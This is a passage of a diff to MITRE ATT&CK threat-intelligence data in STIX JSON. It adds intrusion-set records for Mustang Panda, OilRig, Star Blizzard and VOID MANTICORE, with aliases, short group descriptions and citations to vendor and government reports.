+                        },
+                        {
+                            "source_name": "Anomali MUSTANG PANDA October 2019",
+                            "description": "Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.",
+                            "url": "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations"
+                        },
+                        {
+                            "source_name": "Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022",
+                            "description": "Asheer Malhotra, Jungsoo An, Kendall Mc. (2022, May 5). Mustang Panda deploys a new wave of malware targeting Europe. Retrieved August 4, 2025.",
+                            "url": "https://blog.talosintelligence.com/mustang-panda-targets-europe/"
+                        },
+                        {
+                            "source_name": "Broadcom",
+                            "description": "Broadcom Protection Bulletins. (2025, February 20). Bookworm malware linked to Fireant (aka Stately Tarurus) activity observed in Southeast Asia. Retrieved July 21, 2025.",
+                            "url": "https://www.broadcom.com/support/security-center/protection-bulletin/bookworm-malware-linked-to-fireant-aka-stately-tarurus-activity-observed-in-southeast-asia"
+                        },
+                        {
+                            "source_name": "HorseShell",
+                            "description": "Cohen, Itay. Madej, Radoslaw. Threat Intelligence Team. (2023, May 16). THE DRAGON WHO SOLD HIS CAMARO: ANALYZING CUSTOM ROUTER IMPLANT. Retrieved December 26, 2023.",
+                            "url": "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
+                        },
+                        {
+                            "source_name": "Secureworks BRONZE PRESIDENT December 2019",
+                            "description": "Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.",
+                            "url": "https://www.secureworks.com/research/bronze-president-targets-ngos"
+                        },
+                        {
+                            "source_name": "CSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024",
+                            "description": "CSIRT CTI. (2024, January 23). Stately Taurus Targets Myanmar Amidst Concerns over Military Junta\u2019s Handling of Rebel Attacks. Retrieved August 4, 2025.",
+                            "url": "https://csirt-cti.net/2024/01/23/stately-taurus-targets-myanmar/"
+                        },
+                        {
+                            "source_name": "DOJ Affidavit Search and Seizure PlugX December 2024",
+                            "description": "DOJ. (2024, December 20). Mag. No. 24-mj-1387 AFFIDAVIT IN SUPPORT OF AN APPLICATION  FOR A NINTH SEARCH AND SEIZURE WARRANT- IN THE MATTER OF THE SEARCH AND  SEIZURE OF COMPUTERS IN THE  UNITED STATES INFECTED WITH  PLUGX MALWARE . Retrieved September 9, 2025.",
+                            "url": "https://www.justice.gov/archives/opa/media/1384136/dl"
+                        },
+                        {
+                            "source_name": "EclecticIQ Mustang Panda PlugX",
+                            "description": "EclecticIQ Threat Research Team. (2023, February 2). Mustang Panda APT Group Uses European Commission-Themed Lure to Deliver PlugX Malware. Retrieved September 9, 2025.",
+                            "url": "https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware"
+                        },
+                        {
+                            "source_name": "IBM MUSTANG PANDA PUBLOAD CLAIMLOADER JUNE 2025",
+                            "description": "Golo Muhr, Joshua Chung. (2025, June 23). Hive0154 aka Mustang Panda shifts focus on Tibetan community to deploy Pubload backdoor. Retrieved August 4, 2025.",
+                            "url": "https://www.ibm.com/think/x-force/hive0154-mustang-panda-shifts-focus-tibetan-community-deploy-pubload-backdoor"
+                        },
+                        {
+                            "source_name": "2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA",
+                            "description": "Golo Muhr, Joshua Chung. (2025, May 15). Hive0154 targeting US, Philippines, Pakistan and Taiwan in suspected espionage campaign. Retrieved August 4, 2025.",
+                            "url": "https://www.ibm.com/think/x-force/hive0154-targeting-us-philippines-pakistan-taiwan"
+                        },
+                        {
+                            "source_name": "Recorded Future REDDELTA July 2020",
+                            "description": "Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP \u2018REDDELTA\u2019 TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.",
+                            "url": "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf"
+                        },
+                        {
+                            "source_name": "ATTACKIQ MUSTANG PANDA TONESHELL March 2023",
+                            "description": "Ken Towne, Francis Guibernau. (2023, March 23). Emulating the Politically Motivated Chinese APT Mustang Panda. Retrieved September 10, 2025.",
+                            "url": "https://www.attackiq.com/2023/03/23/emulating-the-politically-motivated-chinese-apt-mustang-panda/"
+                        },
+                        {
+                            "source_name": "Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024",
+                            "description": "Lenart Bermejo, Sunny Lu, Ted Lee. (2024, September 9). Earth Preta Evolves its Attacks with New Malware and Strategies. Retrieved August 4, 2025.",
+                            "url": "https://www.trendmicro.com/en_us/research/24/i/earth-preta-new-malware-and-strategies.html"
+                        },
+                        {
+                            "source_name": "Palo Alto Unit42 STATELY TAURUS TONESHELL September 2023",
+                            "description": "Lior Rochberger, Tom Fakterman, Robert Falcone. (2023, September 22). Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda. Retrieved September 9, 2025.",
+                            "url": "https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/"
+                        },
+                        {
+                            "source_name": "Crowdstrike MUSTANG PANDA June 2018",
+                            "description": "Meyers, A. (2018, June 15). Meet CrowdStrike\u2019s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021.",
+                            "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/"
+                        },
+                        {
+                            "source_name": "Microsoft Naming Conventions Frequently Updated",
+                            "description": "Microsoft. (2025, September 8). How Microsoft names threat actors. Retrieved September 10, 2025.",
+                            "url": "https://learn.microsoft.com/en-us/unified-secops-platform/microsoft-threat-actor-naming"
+                        },
+                        {
+                            "source_name": "Trend Micro Mustang Panda Earth Preta Toneshell February 2025",
+                            "description": "Nathaniel Morales, Nick Dai. (2025, February 18). Earth Preta Mixes Legitimate and Malicious Components to Sidestep Detection. Retrieved September 10, 2025.",
+                            "url": "https://www.trendmicro.com/en_us/research/25/b/earth-preta-mixes-legitimate-and-malicious-components-to-sidestep-detection.html"
+                        },
+                        {
+                            "source_name": "2022 November_TrendMicro_Earth Preta_Toneshell_Pubload",
+                            "description": "Nick Dai, Vickie Su, Sunny Lu. (2022, November 18). Earth Preta Spear-Phishing Governments Worldwide. Retrieved August 4, 2025.",
+                            "url": "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html"
+                        },
+                        {
+                            "source_name": "Google Threat Intelligence Group MUSTANG PANDA PLUGX August 2025",
+                            "description": "Patrick Whitsell. (2025, August 25). Deception in Depth: PRC-Nexus Espionage Campaign Hijacks Web Traffic to Target Diplomats. Retrieved September 9, 2025.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats"
+                        },
+                        {
+                            "source_name": "Proofpoint TA416 November 2020",
+                            "description": "Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader"
+                        },
+                        {
+                            "source_name": "PWC UK MUSTANG PANDA RED LICH February 2021",
+                            "description": "PWC UK. (2021, February 28). Cyber Threats 2020: A Year in Retrospect. Retrieved October 15, 2025.",
+                            "url": "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
+                        },
+                        {
+                            "source_name": "Proofpoint TA416 Europe March 2022",
+                            "description": "Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european"
+                        },
+                        {
+                            "source_name": "Unit42 Bookworm Nov2015",
+                            "description": "Robert Falcone, Mike Scott, Juan Cortes. (2015, November 10). Bookworm Trojan: A Model of Modular Architecture. Retrieved July 21, 2025.",
+                            "url": "https://unit42.paloaltonetworks.com/bookworm-trojan-a-model-of-modular-architecture/"
+                        },
+                        {
+                            "source_name": "Palo Alto Networks, Unit 42",
+                            "description": "Robert Falcone. (2025, February 20). Stately Taurus Activity in Southeast Asia Links to Bookworm Malware. Retrieved July 21, 2025.",
+                            "url": "https://unit42.paloaltonetworks.com/stately-taurus-uses-bookworm-malware/"
+                        },
+                        {
+                            "source_name": "Sophos PlugX September 2022",
+                            "description": "Secureworks Counter Threat Unit Research Team. (2022, April 27). BRONZE PRESIDENT Targets Russian Speakers with Updated PlugX. Retrieved September 9, 2025.",
+                            "url": "https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx"
+                        },
+                        {
+                            "source_name": "Sophos Mustang Panda PLUGX",
+                            "description": "Secureworks Counter Threat Unit Research Team. (2022, September 8). BRONZE PRESIDENT Targets Government Officials. Retrieved September 9, 2025.",
+                            "url": "https://www.secureworks.com/blog/bronze-president-targets-government-officials"
+                        },
+                        {
+                            "source_name": "Zscaler",
+                            "description": "Sudeep Singh. (2025, April 16). Latest Mustang Panda Arsenal: ToneShell and StarProxy | P1. Retrieved July 21, 2025.",
+                            "url": "https://www.zscaler.com/blogs/security-research/latest-mustang-panda-arsenal-toneshell-and-starproxy-p1"
+                        },
+                        {
+                            "source_name": "Trend Micro Mustang Panda Earth Preta TONESHELL June 2023",
+                            "description": "Sunny Lu, Vickie Su, Nick Dai. (2023, June 14). Behind the Scenes: Unveiling the Hidden Workings of Earth Preta. Retrieved September 10, 2025.",
+                            "url": "https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html"
+                        },
+                        {
+                            "source_name": "BlackBerry MUSTANG PANDA October 2022",
+                            "description": "The BlackBerry Research and Intelligence Team. (2022, October 6). Mustang Panda Abuses Legitimate Apps to Target Myanmar Based Victims. Retrieved October 14, 2025.",
+                            "url": "https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims"
+                        },
+                        {
+                            "source_name": "Unit42 Chinese VSCode 06 September 2024",
+                            "description": "Tom Fakterman. (2024, September 6). Chinese APT Abuses VSCode to Target Government in Asia. Retrieved March 24, 2025.",
+                            "url": "https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Kyaw Pyiyt Htet, @KyawPyiytHtet",
+                        "Jiraput Thamsongkrah",
+                        "ZScaler ThreatLabz"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2026-04-19 00:11:03.898000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-12-14 16:46:06.044000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "OilRig",
+                    "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: Unit 42 QUADAGENT July 2018)",
+                    "aliases": [
+                        "OilRig",
+                        "COBALT GYPSY",
+                        "IRN2",
+                        "APT34",
+                        "Helix Kitten",
+                        "Evasive Serpens",
+                        "Hazel Sandstorm",
+                        "EUROPIUM",
+                        "ITG13",
+                        "Earth Simnavaz",
+                        "Crambus",
+                        "TA452"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0049",
+                            "external_id": "G0049"
+                        },
+                        {
+                            "source_name": "IRN2",
+                            "description": "(Citation: Crowdstrike Helix Kitten Nov 2018)"
+                        },
+                        {
+                            "source_name": "ITG13",
+                            "description": "(Citation: IBM ZeroCleare Wiper December 2019)"
+                        },
+                        {
+                            "source_name": "Hazel Sandstorm",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "EUROPIUM",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "OilRig",
+                            "description": "(Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018)"
+                        },
+                        {
+                            "source_name": "TA452",
+                            "description": "(Citation: Proofpoint Iranian Aligned Attacks JAN 2020)"
+                        },
+                        {
+                            "source_name": "COBALT GYPSY",
+                            "description": "(Citation: Secureworks COBALT GYPSY Threat Profile)"
+                        },
+                        {
+                            "source_name": "Crambus",
+                            "description": "(Citation: Symantec Crambus OCT 2023)"
+                        },
+                        {
+                            "source_name": "Earth Simnavaz",
+                            "description": "(Citation: Trend Micro Earth Simnavaz October 2024)"
+                        },
+                        {
+                            "source_name": "Helix Kitten",
+                            "description": "(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)"
+                        },
+                        {
+                            "source_name": "Evasive Serpens",
+                            "description": "(Citation: Unit42 OilRig Playbook 2023)"
+                        },
+                        {
+                            "source_name": "Check Point APT34 April 2021",
+                            "description": "Check Point. (2021, April 8). Iran\u2019s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.",
+                            "url": "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/"
+                        },
+                        {
+                            "source_name": "ClearSky OilRig Jan 2017",
+                            "description": "ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.",
+                            "url": "http://www.clearskysec.com/oilrig/"
+                        },
+                        {
+                            "source_name": "Trend Micro Earth Simnavaz October 2024",
+                            "description": "Fahmy, M. et al. (2024, October 11). Earth Simnavaz (aka APT34) Levies Advanced Cyberattacks Against Middle East. Retrieved November 27, 2024.",
+                            "url": "https://www.trendmicro.com/en_us/research/24/j/earth-simnavaz-cyberattacks.html"
+                        },
+                        {
+                            "source_name": "Palo Alto OilRig May 2016",
+                            "description": "Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.",
+                            "url": "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/"
+                        },
+                        {
+                            "source_name": "Palo Alto OilRig April 2017",
+                            "description": "Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.",
+                            "url": "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/"
+                        },
+                        {
+                            "source_name": "Palo Alto OilRig Oct 2016",
+                            "description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.",
+                            "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/"
+                        },
+                        {
+                            "source_name": "IBM ZeroCleare Wiper December 2019",
+                            "description": "Kessem, L. (2019, December 4). New Destructive Wiper ZeroCleare Targets Energy Sector in the Middle East. Retrieved September 4, 2024.",
+                            "url": "https://securityintelligence.com/posts/new-destructive-wiper-zerocleare-targets-energy-sector-in-the-middle-east/"
+                        },
+                        {
+                            "source_name": "Unit 42 QUADAGENT July 2018",
+                            "description": "Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/"
+                        },
+                        {
+                            "source_name": "Crowdstrike Helix Kitten Nov 2018",
+                            "description": "Meyers, A. (2018, November 27). Meet CrowdStrike\u2019s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.",
+                            "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Proofpoint Iranian Aligned Attacks JAN 2020",
+                            "description": "Proofpoint. (2020, January 10). Iranian State-Sponsored and Aligned Attacks: What You Need to Know and Steps to Protect Yourself. Retrieved January 16, 2025.",
+                            "url": "https://www.proofpoint.com/us/corporate-blog/post/iranian-state-sponsored-and-aligned-attacks-what-you-need-know-and-steps-protect"
+                        },
+                        {
+                            "source_name": "FireEye APT34 Dec 2017",
+                            "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
+                        },
+                        {
+                            "source_name": "Secureworks COBALT GYPSY Threat Profile",
+                            "description": "Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.",
+                            "url": "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy"
+                        },
+                        {
+                            "source_name": "Symantec Crambus OCT 2023",
+                            "description": "Symantec Threat Hunter Team. (2023, October 19). Crambus: New Campaign Targets Middle Eastern Government. Retrieved November 27, 2024.",
+                            "url": "https://www.security.com/threat-intelligence/crambus-middle-east-government"
+                        },
+                        {
+                            "source_name": "APT34",
+                            "description": "This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)"
+                        },
+                        {
+                            "source_name": "Unit 42 Playbook Dec 2017",
+                            "description": "Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.",
+                            "url": "https://pan-unit42.github.io/playbook_viewer/"
+                        },
+                        {
+                            "source_name": "Unit42 OilRig Playbook 2023",
+                            "description": "Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.",
+                            "url": "https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Robert Falcone",
+                        "Bryan Lee",
+                        "Dragos Threat Intelligence",
+                        "Jaesang Oh, KC7 Foundation"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "5.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2025-01-16 18:55:49.463000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "5.0"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--9b36c218-4d80-4ec6-a68d-cc2886bbe410",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-06-14 18:17:18.727000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "Star Blizzard",
+                    "description": "[Star Blizzard](https://attack.mitre.org/groups/G1033) is a cyber espionage and influence group originating in Russia that has been active since at least 2019. [Star Blizzard](https://attack.mitre.org/groups/G1033) campaigns align closely with Russian state interests and have included persistent phishing and credential theft against academic, defense, government, NGO, and think tank organizations in NATO countries, particularly the US and the UK.(Citation: Microsoft Star Blizzard August 2022)(Citation: CISA Star Blizzard Advisory December 2023)(Citation: StarBlizzard)(Citation: Google TAG COLDRIVER January 2024)\n",
+                    "aliases": [
+                        "Star Blizzard",
+                        "SEABORGIUM",
+                        "Callisto Group",
+                        "TA446",
+                        "COLDRIVER"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G1033",
+                            "external_id": "G1033"
+                        },
+                        {
+                            "source_name": "Callisto Group",
+                            "description": "(Citation: CISA Star Blizzard Advisory December 2023)"
+                        },
+                        {
+                            "source_name": "TA446",
+                            "description": "(Citation: CISA Star Blizzard Advisory December 2023)"
+                        },
+                        {
+                            "source_name": "COLDRIVER",
+                            "description": "(Citation: Google TAG COLDRIVER January 2024)"
+                        },
+                        {
+                            "source_name": "SEABORGIUM",
+                            "description": "(Citation: Microsoft Star Blizzard August 2022)"
+                        },
+                        {
+                            "source_name": "CISA Star Blizzard Advisory December 2023",
+                            "description": "CISA, et al. (2023, December 7). Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns. Retrieved June 13, 2024.",
+                            "url": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-341a"
+                        },
+                        {
+                            "source_name": "Microsoft Star Blizzard August 2022",
+                            "description": "Microsoft Threat Intelligence. (2022, August 15). Disrupting SEABORGIUM\u2019s ongoing phishing operations. Retrieved June 13, 2024.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations/"
+                        },
+                        {
+                            "source_name": "StarBlizzard",
+                            "description": "Microsoft Threat Intelligence. (2023, December 7). Star Blizzard increases sophistication and evasion in ongoing attacks. Retrieved February 13, 2024.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/"
+                        },
+                        {
+                            "source_name": "Google TAG COLDRIVER January 2024",
+                            "description": "Shields, W. (2024, January 18). Russian threat group COLDRIVER expands its targeting of Western officials to include the use of malware. Retrieved June 13, 2024.",
+                            "url": "https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Aung Kyaw Min Naing, @Nolan"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2025-10-22 22:12:56.172000+00:00\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--ebd7ce77-c9ba-4fba-bb28-58296ac66559",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 15:16:16.697000+00:00",
+                    "modified": "2026-05-12 16:30:18.375000+00:00",
+                    "name": "VOID MANTICORE",
+                    "description": "[VOID MANTICORE](https://attack.mitre.org/groups/G1055) is a threat group assessed to operate on behalf of Iran\u2019s Ministry of Intelligence and Security (MOIS).(Citation: Check Point VOID MANTICORE Handala Hack March 2026) Active since at least mid-2022, VOID MANTICORE has targeted government entities, critical infrastructure, and private sector organizations across Albania, Israel, and the United States.(Citation: Check Point VOID MANTICORE Handala Hack March 2026)(Citation: Palo Alto VOID MANTICORE Iran Cyber Threats March 2026) [VOID MANTICORE](https://attack.mitre.org/groups/G1055) conducts destructive cyber operations, combining wiper attacks with hack-and-leak campaigns. The group has operated under multiple public-facing personas, including [HomeLand Justice](https://attack.mitre.org/campaigns/C0038) in operations against Albania, Karma and Karma Below in campaigns targeting Israeli organizations, and Handala Hack, its current primary persona, which has claimed activity against Israeli and U.S. entities, including a March 2026 attack against Stryker Corporation.(Citation: Check Point VOID MANTICORE Handala Hack March 2026)(Citation: DOJ FBI Handala Hack March 2026)  [VOID MANTICORE](https://attack.mitre.org/groups/G1055) has been observed collaborating with Scarred Manticore, which has been linked to initial access operations preceding VOID MANTICORE\u2019s activity.(Citation: Domain Tools Handala Hack Karma Homeland Justice MOIS April 2026) ",
+                    "aliases": [
+                        "VOID MANTICORE",
+                        "COBALT MYSTIQUE",
+                        "Handala Hack",
+                        "Homeland Justice",
+                        "Karma",
+                        "Karmabelow80",
+                        "BANISHED KITTEN",
+                        "Red Sandstorm"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G1055",
+                            "external_id": "G1055"
+                        },
+                        {
+                            "source_name": "BANISHED KITTEN",
+                            "description": "(Citation: Check Point VOID MANTICORE Handala Hack March 2026)"
+                        },
+                        {
+                            "source_name": "Red Sandstorm",
+                            "description": "(Citation: Check Point VOID MANTICORE Handala Hack March 2026)"
+                        },
+                        {
+                            "source_name": "Handala Hack",
+                            "description": "(Citation: DOJ FBI Handala Hack March 2026)"
+                        },
+                        {
+                            "source_name": "Homeland Justice",
+                            "description": "(Citation: DOJ FBI Handala Hack March 2026)"
+                        },
+                        {
+                            "source_name": "Karma",
+                            "description": "(Citation: DOJ FBI Handala Hack March 2026)"
+                        },
+                        {
+                            "source_name": "COBALT MYSTIQUE",
+                            "description": "(Citation: Sophos VOID MANTICORE COBALT MYSTIQUE other Names April 2026)"
+                        },
+                        {
+                            "source_name": "Karmabelow80",
+                            "description": "(Citation: Sophos VOID MANTICORE COBALT MYSTIQUE other Names April 2026)"
+                        },
+                        {
+                            "source_name": "Check Point VOID MANTICORE Handala Hack March 2026",
+                            "description": "Check Point Research. (2026, March 12). \u201cHandala Hack\u201d \u2013 Unveiling Group\u2019s Modus Operandi. Retrieved April 20, 2026.",
+                            "url": "https://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/"
+                        },
+                        {
+                            "source_name": "DOJ FBI Handala Hack March 2026",
+                            "description": "DOJ/FBI. (2026, March 19). Case 1:26-mj-00683-CDA: Affidavit in Support of Seizure Warrant: In the Matter of the Seizure of Domain Names Justicehomeland[.]org; karmabelow80[.]org; handala-hack[.]to; and handala-redwatned[.]to. Retrieved April 20, 2026.",
+                            "url": "https://www.justice.gov/opa/media/1431956/dl?inline"
+                        },
+                        {
+                            "source_name": "Domain Tools Handala Hack Karma Homeland Justice MOIS April 2026",
+                            "description": "DomainTools Investigations. (2026, April 6). Handala: MOIS Linked Cyber Influence Ecosystem Threat Intelligence Assessment. Retrieved April 20, 2026.",
+                            "url": "https://dti.domaintools.com/research/handala-mois-linked-cyber-influence-ecosystem-threat-intelligence-assessment"
+                        },
+                        {
+                            "source_name": "Palo Alto VOID MANTICORE Iran Cyber Threats March 2026",
+                            "description": "Justin Moore. (2026, March 16). Iranian Cyber Threat Evolution: From MBR Wipers to Identity Weaponization. Retrieved April 20, 2026.",
+                            "url": "https://unit42.paloaltonetworks.com/evolution-of-iran-cyber-threats/"
+                        },
+                        {
+                            "source_name": "Sophos VOID MANTICORE COBALT MYSTIQUE other Names April 2026",
+                            "description": "Sophos. (2026, April 20). Iran COBALT MYSTIQUE. Retrieved April 20, 2026.",
+                            "url": "https://www.sophos.com/en-us/threat-profiles/cobalt-mystique"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
